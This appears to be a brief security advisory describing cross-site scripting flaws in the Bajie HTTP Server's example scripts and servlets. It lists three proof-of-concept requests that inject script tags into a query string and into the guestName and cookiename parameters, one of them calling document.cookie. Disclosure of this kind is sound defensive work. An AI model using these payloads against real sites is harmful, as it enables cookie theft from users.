Bajie HTTP Server Example Scripts And Servlets Cross-Site Scripting Vulnerability

Bajie HTTP Server Example Scripts And Servlets Cross-Site Scripting Vulnerability

The following proof of concept has been supplied:

http://www.example.com/cgi/bin/test.txt?<script>alert(document.cookie)</script>
POST /servlet/custMsg?guestName=<script>alert("bang")</script> HTTP/1.0
POST /servlet/CookieExample?cookiename=<script>alert("bang")</script>&cookievalue=&cookiepath=
HTTP/1.0